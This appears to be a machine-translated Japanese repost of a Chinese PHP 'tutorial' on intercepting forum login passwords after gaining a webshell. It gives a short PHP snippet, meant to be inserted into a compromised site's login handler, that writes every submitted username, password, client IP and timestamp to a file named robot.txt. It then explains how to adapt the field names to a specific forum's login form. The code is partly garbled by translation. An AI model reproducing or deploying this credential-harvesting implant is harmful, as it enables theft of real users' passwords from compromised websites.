PHP バックグラウンド ログイン パスワードをインターセプトするコード_PHP チュートリアル

Webシェルを取得した後、さらに侵入したい場合、discuzなどのパスワードはmd5で直接暗号化されていないため、解読するのは非常に困難です。以前ビッグ塔用に一度書いたのですが、昨日たまたまピギー兄さんが使っていたので再度書きました。コードは比較的単純で、ほんの数文です。原理を詳しく説明しますので、PHP についてあまり知らない友人にも安心してご利用いただけます。

if($_POST[loginsubmit]!=){ //ログインボタンがクリックされたかどうかを判定します

$sb=user:.$_POST[ユーザー名].--passwd:.$_POST[パスワード].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // POSTで受け取った値を連結して変数$sbに代入します

fwrite(fopen(robot.txt,ab),$sb);} //結果をファイルに書き込みます

以下は、Huaxia のログインページを例にした簡単な分析です。 bbs.xxx.com/login.php を開き、右クリックしてソース コードを表示し、CTRL+F 検索アクションでログイン フォームを見つけます。

キーコードをコピーしただけです。

// アクションの後の値は、ログインを処理するフォーム送信のアドレスです。パスワードが正しいかどうかを判断するのは POST なので、$_POST を使用して受信します。

。 。 。 。強力な省略記号。 。 。 。 。 。

アカウント(U):

<入力

class=input id=pwuser accessKey=u size=16

name=pwuser> //ユーザー名の入力ボックス、$_POST[username] に対応する必要があるため、Huaxia のパスワードを傍受するには変更が必要です$_POST[pwuser] へ

パスワード (P):

class=input id=pwpwd accessKey=p

type=password size=16 name=pwpwd> //ユーザー名の入力ボックス。$_POST[username] に対応する必要があるので、 Huaxia のパスワードを傍受するには、$_POST[pwpwd] に変更する必要があります

http://www.bkjia.com/PHPjc/478807.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/478807.html技術記事 WebShell を取得した後、さらに侵入したい場合、discuz などのパスワードは md5 で直接暗号化されていないため、解読するのは非常に困難です。以前一度ダトウの執筆を手伝ったのですが、昨日たまたまピギー兄弟がそれを使用しました...